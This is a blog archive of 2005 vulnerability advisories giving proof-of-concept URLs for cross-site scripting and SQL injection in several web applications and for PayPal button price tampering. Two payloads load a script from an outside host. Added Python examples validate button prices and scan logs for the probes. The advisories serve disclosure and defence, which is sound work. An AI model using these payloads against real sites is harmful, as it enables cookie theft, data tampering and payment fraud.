######################## End #############################

Thnx to estrella for being my light
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

Clever copy 'calendar.php' 'yr' variable cross site scripting

Friday, July 15, 2005
################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system. You can run it as a very simple blog or ramp it up to a full
Content Management System.

Clever Copy contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate the 'yr'
variable upon submission to the 'calendar.php' script. This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005

##############
EXPLOIT
##############

http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>

######################## End #############################

Thnx to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move...

class-1 Forum Software Cross site scripting

Thursday, July 14, 2005
#########################################################
class-1 Forum Software Cross site scripting.
Original advisory:http://lostmon.blogspot.com/2005/07/
class-1-forum-software-cross-site.html
Vendor url:http://www.class1web.co.uk/download_forum.php
Vendor notify: yes exploit available: yes
OSVDB ID:17920,17921,17922,17923
Secunia: SA16078
BID: 14261
Securitytracker: 1014485 1014486
##########################################################


class-1 Forum Software is a PHP/MySQL driven web forum.

class-1 Forum contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate the 'viewuser_id' and 'group' variables upon
submission to the 'users.php' script. This could allow a user to create
a specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and
the server, leading to a loss of integrity.

##################
versions
##################

class-1 Forum Software (v 0.23.2) vulnerable.
class-1 Forum Software (v 0.24.4) vulnerable.

It is possible that other versions are vulnerable too.

Clever Copy (http://clevercopy.bestdirectbuy.com/)
with the affected forums module installed.

Clever Copy 2.0
Clever Copy 2.0a

###################
Solution
###################

no solution at this time.

################
Timeline
################

discovered: 10-07-2005
vendor notify: 12-07-2005 (Webform)
vendor response:
2 vendor response:12-07-2005 (Clever Copy)
disclosure: 14-07-2005


##############################
proof of Cross site Scripting
##############################

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]

http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]


#########################
possible SQL injections
#########################

http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]

SQL Error
There was an error executing the query - SELECT * FROM attachments
WHERE attach_id='''
You have an error in your SQL syntax near ''''' at line 1

-------

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]

There was an error executing the query - SELECT * FROM users
WHERE user_id='''
You have an error in your SQL syntax near ''''' at line 1

--------

http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]

There was an error executing the query - SELECT * FROM messages
WHERE id='''
You have an error in your SQL syntax near ''''' at line 1

---------

http://[victim]/forum/viewforum.php?forum=[SQL-Injection]

There was an error executing the query - SELECT * FROM group_permissions
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1

----------
#################### End ###########################

Thnx to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

ATutor multiple variable Cross site scripting

Wednesday, June 15, 2005
################################################
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORY:http://lostmon.blogspot.com/2005/06/
atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
OSVDB ID:17351,17352,17353,17354,17355
17356,17357,17358,17359.
Secunia: SA15705
Securitytracker: 1014216
BID: 13972
################################################

ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.

ATutor contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


###########
versions:
###########

ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
ATutor 1.5 RC 2 vulnerable
Atutor 1.5 RC 3 not tested

#############
solution
#############

Upgrade to version ATutor 1.5RC3 or higher, as it has been
reported to fix this vulnerability. An upgrade is required
as there are no known workarounds.


##############
timeline
##############

discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
vendor response: 27-06-2005
disclosure: 16-06-2005


##################
Proof of concepts
##################

http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]

http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]

http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]

http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]

http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search

http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results

http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search

http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search

http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]

Exploiting some of these flaws requires a client login.
Other scripts and other variables are vulnerable
to the same style of attack.


############### End ##############

Thnx to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

PayPal arbitrary price manipulation

Monday, May 30, 2005
##############################################
PayPal 'buttons' price manipulation.
vendor url:https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/
paypal-arbitrary-price-manipulation.html
vendor notify: yes exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################

PayPal buttons are prone to price manipulation.
All stores based on PayPal buttons are possibly
vulnerable to this flaw.


##########################
code example of a button
##########################
The proof is based on this form:

https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside

In the exploitation example we used a "PayPal price manipulation kit" program as the product to buy.
This is a non-existent product...

The link of the shopping button has this URL:
(1)
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15


This is the normal price for the product (19.90$), but...
if we change the 'amount' variable to 0.01 the product now costs 0.01$:

https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15

Another way of exploiting this situation:

(2)
This other example comes from a store based on PayPal:

https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+ kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1&currency_code=USD

If we look closely, we can change not only the price but also the email account,
the name of the product, and other details.
For shopping you need an account on PayPal.
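
An added merchant-side check (constructed Python, not PayPal's or any store's code) for the button parameters the advisory walks through: business, item_number, item_name, amount and currency_code are re-derived from a server-side catalogue, and the order is rejected when the client-visible values differ, which is what catches the 0.01 amount above. The catalogue, the merchant address and the query strings are constructed.

```python
"""Constructed merchant-side validator for PayPal button parameters.

Not PayPal's or any store's code. The advisory shows that business,
item_name, item_number, amount and currency_code ride in the client-visible
button URL, so a store must re-derive every one of them from its own
catalogue before treating an order as paid. Catalogue, merchant address and
the query strings used here are constructed.
"""
from decimal import Decimal, InvalidOperation
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

MERCHANT_EMAIL = "merchant@example.com"  # stands in for [EMAIL-Bussines]
EXPECTED_CURRENCY = "USD"

# item_number -> (item_name, price). The catalogue is the authority on price.
CATALOGUE: Dict[str, Tuple[str, Decimal]] = {
    "1": ("PayPal price manipulation kit", Decimal("19.90")),
}


def _money(value: str) -> Decimal:
    """Parse a money field strictly: finite, at most two decimals."""
    try:
        amt = Decimal(value)
        if not amt.is_finite() or amt != amt.quantize(Decimal("0.01")):
            raise ValueError
    except (InvalidOperation, ValueError):
        raise ValueError(f"not a money amount: {value!r}")
    return amt


def validate_button_params(query: str) -> List[str]:
    """Check a button query string against the catalogue.

    Returns the list of mismatches; an empty list means every client-supplied
    value equals what the store itself would have sent.
    """
    q = {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}
    problems: List[str] = []

    if q.get("business") != MERCHANT_EMAIL:
        problems.append("business is not the merchant account")
    # The first advisory URL omits currency_code; absent means the default.
    if q.get("currency_code", EXPECTED_CURRENCY) != EXPECTED_CURRENCY:
        problems.append("unexpected currency_code")

    item = CATALOGUE.get(q.get("item_number", ""))
    if item is None:
        problems.append("unknown item_number")
        return problems
    name, price = item
    if q.get("item_name") != name:
        problems.append("item_name does not match catalogue")
    try:
        amount = _money(q.get("amount", ""))
        if amount != price:
            problems.append(f"amount {amount} differs from catalogue price {price}")
    except ValueError as exc:
        problems.append(str(exc))

    # Money fields from the cart-style URL must parse and must not be
    # negative; a negative one would offset the item price.
    for extra in ("shipping", "shipping2", "handling"):
        if extra in q:
            try:
                if _money(q[extra]) < 0:
                    problems.append(f"{extra} is negative")
            except ValueError as exc:
                problems.append(str(exc))
    return problems


# Constructed query strings modelled on the advisory's first button URL.
GENUINE = ("cmd=_xclick&business=merchant@example.com"
           "&item_name=PayPal+price+manipulation+kit&item_number=1"
           "&amount=19.90&no_shipping=1")
TAMPERED = GENUINE.replace("amount=19.90", "amount=0.01")

if __name__ == "__main__":
    print("genuine :", validate_button_params(GENUINE) or "ok")
    print("tampered:", validate_button_params(TAMPERED))
```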

#############
timeline:
#############

discovered: 14 may 2005
vendor notify: 25 may 2005
Vendor response: 26 may 2005
disclosure: 27 may 2005
Public disclosure: 30 may 2005


################### End ####################

thnx to estrella for being my light
thnx to icaro, he is my support
Thnx to FalconDeOro ... patience.
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!

contact to FalconDeOro
(falcondeoro@gmail.com)
http://falcondeoro.blogspot.com

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what makes the mind move

Quick Cart Search field cross site scripting and script insertion

Sunday, May 29, 2005
#####################################################
Quick Cart Search field cross site scripting and script insertion
vendor url:http://www.quickcart.com/
advisory:http://lostmon.blogspot.com/2005/05/
quick-cart-search-field-cross-site.html
vendor notify: yes exploit available: yes
Securitytracker:1014076
#####################################################

Quick Cart contains a flaw that allows a remote cross
site scripting attack. This flaw exists because the
application does not validate the 'search' field upon
submission to the 'search.cfm' script. This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


############
versions
############

Free edition affected:
https://www.quickcart.com/qc_checkout.cfm


But it is possible that other versions (standard or others) are affected.


################
solution
################

No solution was available at this time.

#############
Timeline
#############

discovered: 10 may 2005
vendor notify: 27 may 2005
vendor response: 27 may 2005
disclosure: 29 may 2005

##############
exploit
##############

Put this in the search box of the store:

//"><script>alert(document.cookie)</script>

or

//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script>

and the script executes; this is an XSS flaw
and a possible script insertion.


#################### End ###################

Thnx to http://www.drorshalev.com for this script
and for hosting it for this demonstration.

thnx to estrella for being my light
thnx to all the http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind

BookReview 1.0 multiple variable XSS

Wednesday, May 25, 2005
###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisory:http://lostmon.blogspot.com/2005/05/bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
OSVDB ID:16871,16872,16873,16874,16875,16876,16877,16878,16879,16880,16881
BID:13783
Securitytracker: 1014058
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack. This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts. This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

############
versions:
############

BookReview beta 1.0 is vulnerable.

##############
solution
##############

no solution was available at this time

###########
timeline
###########

discovered: 27 april 2005
vendor notify: 17 may 2005 (webform)
disclosure: 26 may 2005

##################
proof of concepts
##################

all modules are loaded through the 'index.php' script via the 'page' variable, like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of the module can be 'add_review', 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25

is the same as this one:

http://[victim]/add_contents.htm?isbn=083081423X&chapters=25

so there are two ways of exploiting this situation,
one through index.php and the other directly through the module.

##################
add_review.htm
##################

http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!




###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics"><script>alert(document.cookie)</script>

#############################
possible local file inclusion
#############################

http://[victim]/suggestions/"><script>alert(document.cookie)</script> .htm

http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=author

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title
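As an added defender-side example (not part of this advisory), the following log scanner URL-decodes each request and flags the probes shown above, whether the marker travels in a query parameter (through index.php or the module directly) or in the path as in the suggestions/ and directory/ URLs; the log lines and client IPs are constructed.

```python
# Added example, not code from the advisories: a log-side detector for the
# reflected-XSS probes shown above. Sample log lines and IPs are constructed.
import re
from urllib.parse import unquote, urlsplit, parse_qsl

SCRIPT_RE = re.compile(r'<\s*script\b', re.IGNORECASE)   # <script> and <SCRIPT src=
BREAKOUT_RE = re.compile(r'\\?["\']\s*>')                # "> or \"> attribute escape
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode(value):
    """Percent-decode up to twice so double-encoded probes are not missed."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return (location, reason) pairs for one request target (path + query)."""
    parts = urlsplit(target)
    hits = []
    if SCRIPT_RE.search(decode(parts.path)):        # e.g. /suggestions/"><script>... .htm
        hits.append(('path', 'script tag in path'))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = decode(value)                       # parse_qsl already decoded once
        if SCRIPT_RE.search(value):
            reason = 'attribute break-out + script' if BREAKOUT_RE.search(value) else 'script tag'
            hits.append(('param:' + name, reason))
    return hits

def scan_log(lines):
    """Return (client, location, reason) for every flagged request in the log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            client, target = m.groups()
            findings += [(client, loc, why) for loc, why in classify(target)]
    return findings

# Constructed sample (Apache combined-log style) mirroring the PoC URLs above.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/May/2005:10:01:02 +0000] "GET /index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25 HTTP/1.1" 200 512',
    '198.51.100.7 - - [26/May/2005:10:01:05 +0000] "GET /search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author HTTP/1.1" 200 640',
    '198.51.100.7 - - [26/May/2005:10:01:09 +0000] "GET /suggestions/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%20.htm HTTP/1.1" 404 210',
    '203.0.113.9 - - [26/May/2005:10:02:00 +0000] "GET /index.php?page=add_contents&isbn=083081423X&chapters=25 HTTP/1.1" 200 2048',
]
```

Running `scan_log(SAMPLE_LOG)` reports the three probing requests with the parameter or path that carried the marker, and nothing for the benign fourth line.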

######################## End ########################

thnx to estrella for being my light
Thnx to icaro, he is my Shadow !!!
thnx to all the http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind

Spread The Word multiple XSS and SQL injections

Tuesday, May 24, 2005
####################################################
Spread The Word (Comersus-based bookstore) multiple
script and variable XSS and SQL injection vulnerabilities.
vendor url:http://www.stwm.com/opportunity.asp
advisory url:http://lostmon.blogspot.com/2005/05/spread-word-multiple-xss-and-sql.html
vendor notified:yes exploit available: yes
BID:13733 and 13737
####################################################

Spread The Word (Comersus-based bookstore) contains a flaw that
allows a remote cross site scripting attack. This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts. This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.


##############
versions:
##############

I couldn't establish which versions are affected.

##############
solution:
##############

no solution was available at this time.

##############
timeline
##############

discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005



####################
proof of concepts:
####################

Some files have a different prefix like STW;
e.g. 'ShowContent.asp' in other stores is 'STWShowContent.asp'

#####################
BrowseCategories.asp
#####################

XSS, SQL errors and path disclosure.

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible

Cat0Literal can be books, videos, gifts, bibles, or other similar categories listed in the cart.

#############
search.asp
#############

XSS, SQL errors and path disclosure.

http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala

http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='

##################
AdvancedSearch.asp
##################

http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit


##################
ViewItem.asp
##################

XSS, SQL errors and path disclosure.

http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]

http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]



###################
STWShowContent.asp
###################
XSS, SQL errors and path disclosure.

http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]

http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]

http://[target]/store/STWShowContent.asp

###################
MySide.Asp
###################
XSS, SQL errors and path disclosure.

http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]

http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles

#################
BrowseMain.asp
#################
XSS, SQL errors and path disclosure.

http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>

################
others
################
XSS

http://[target]/store/NewCustomer.asp?newemail=zzzz@lalala.es&RedirectURL=[XSS-CODE]

http://[target]/store/Login.asp?RedirectURL=[XSS-code]

It is also possible to inject SQL or XSS code into the 'Cat0' or 'Cat1'
variable in all files where these variables are used.

It is also possible to inject XSS code into the 'Cat0literal' or 'Cat1literal'
variable in all files where these variables are used.

################### End ################

thnx to estrella for being my light
Thnx to icaro, he is my Shadow !!!
thnx to all the http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind
 
